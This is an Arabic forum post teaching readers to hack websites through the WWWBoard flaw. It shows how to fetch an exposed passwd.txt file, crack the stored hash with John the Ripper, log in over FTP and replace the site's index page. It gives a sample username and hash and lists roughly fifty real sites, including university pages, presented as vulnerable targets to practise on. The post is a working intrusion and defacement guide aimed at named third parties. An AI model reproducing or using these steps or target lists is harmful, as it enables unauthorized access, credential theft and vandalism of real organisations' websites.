إختراق المواقع عبر ثغرة
 

السلام عليكم

أولا وقبل كل شي أرجوا عدم استخدام الثغرة فيما يخل بالإسلام وفيما حرمه الله

الآن نبدأ الحديث هذه الثغرة الظاهر طرحت من قبل هنا

ولكنني أعيدها لانها محفوظة عندي من زمااااااان وأحببت أن تبقى الملكية لصاحبها
========================
ثغرة الـWWWBoard
هي أسهل ثغرة بالإضافة إلى الفرونت بيج.
لنفترض أن الموقع المراد إختراقه هو http://www.boardprep.net/
لنضف إليه
wwwboard/passwd.txt
فيصبح العنوان http://www.boardprep.net/wwwboard/passwd.txt
نفتح العنوان سوف تجد cknouse:aexMVWnDOyrdE
كلمة المرور:إسم المستخدم
يعني إسم المستخدم هو cknouse
وكلمة المرور هيaexMVWnDOyrdE
فك تشفيره بجون ذي ريبر
الحين عندك إسم المستخدم وكلمة المرور وش تسوي عشان تغير الصفحة الرئيسية
روح للفتب وإكتب ftp.domen.com
ملاحظة إستبدل domen.com بإسم الموقع إلي عندك باسوورده
وحط اليوزر نيم والباسس وإدخل على الموقع أنشئ صفحة بإسم index.html
وإرفعها للموقع
لتحميل الفتب
http://www.motken.com/dawnload/porogram/wsftppro.zip

للتطبيق

هذه مواقع مصابة بالثغرة
http://kidlink.sunet.se/rti/irc/wwwboard/passwd.txt
http://www.hillsidespca.com/wwwboard/passwd.txt
http://www.lionnet.org.tr/118u/wwwboard/passwd.txt
http://www.cytoskeleton.com/wwwboard/passwd.txt
http://www.locon.org/wwwboard/passwd.txt
http://www.kcftoa.org/hazmat/wwwboard/passwd.txt
http://www.wgbhalumni.org/wwwboard/passwd.txt
http://www.creative-design.de/kmt/wwwboard/passwd.txt
http://www.kaapeli.fi/~hekata/wwwboard/passwd.txt
http://www.wbref.ch/wwwboard/passwd.txt
http://www.fys.ku.dk/~voss/utopia/wwwboard/passwd.txt
http://www.awdansey.co.uk/wwwboard/passwd.txt
http://www.mpset.com/wwwboard/passwd.txt
http://www.selectfire.com/wwwboard/passwd.txt
http://www.climbnh.com/wwwboard/passwd.txt
http://cwww.com/wwwboard/passwd.txt
http://sitemanager.hypermart.net/wwwboard/passwd.txt
http://www.foxsden.org/psf/FFE/wwwboard/passwd.txt
http://www.notam.com/forum/passwd.txt
http://www.sandiego.edu/~deroche/group4p/passwd.txt
http://www.sandiego.edu/~deroche/case7/passwd.txt
http://www.louisville.com/talk/passwd.txt
http://indianlake.com/cgibin/passwd.txt
http://www.swe.org/SWE/Convention/den01/passwd.txt
http://www.uidaho.edu/webboard/src/passwd.txt
http://dykesworld.de/Boards/sistah/passwd.txt
http://www.public.iastate.edu/~n2ddg/IE565/passwd.txt
http://www.ycgroup.com/board/passwd.txt
http://www.doc.ic.ac.uk/~ipa98/jondon/passwd.txthttp://www.defenders.by.ru/texts/unix/unix-passwd.txt
http://www.public.iastate.edu/~benco/oclub/passwd.txt
http://www.ycgroup.com/board/passwd.txt
http://www.unionmen.com/forum/passwd.txt
http://facyt.uc.edu.ve/foros/passwd.txt
http://www.ku.edu/~philos/courses/wwwboard3/passwd.txt
http://ponce.inter.edu/forums/passwd.txt
http://students.washington.edu/msa/c...lum/passwd.txt
http://www.uidaho.edu/webboard/src/passwd.txt
http://www.louisville.com/talk/passwd.txt
http://www.motosalvagedirectory.com/forums/passwd.txt
http://www.mexconnect.com/liveboard/passwd.txt
http://www.inece.org/ozone/passwd.txt
http://cds.unina.it/~tuccillo/passwd.txt
http://ponce.inter.edu/forums/prueba/passwd.txt
http://paradigm-dc.hypermart.net/passwd.txt
http://clonetheory.virtualave.net/passwd.txt
http://www.uni-ulm.de/LiLL/foren/forum1/passwd.txt
http://www.artintheschool.org/forum/passwd.txt
http://www.mag7.net/floor/passwd.txt
http://www.urban-forestry.com/forum/passwd.txt

الله يا كثرها فك التشفير واشتغل

بس تراها تأخذ وقت طويييييل احيانا في فك التشفير

واذا كان عندك موقع تبي تتأكد أنه مصاب بالثغرة أو لا

تفضل هذا الموقع فهو يعطيك بيانات عن الموقع

http://www.netcraft.com

أسف يا أصحاب هادي الروابط جمعتها منواقع أخرى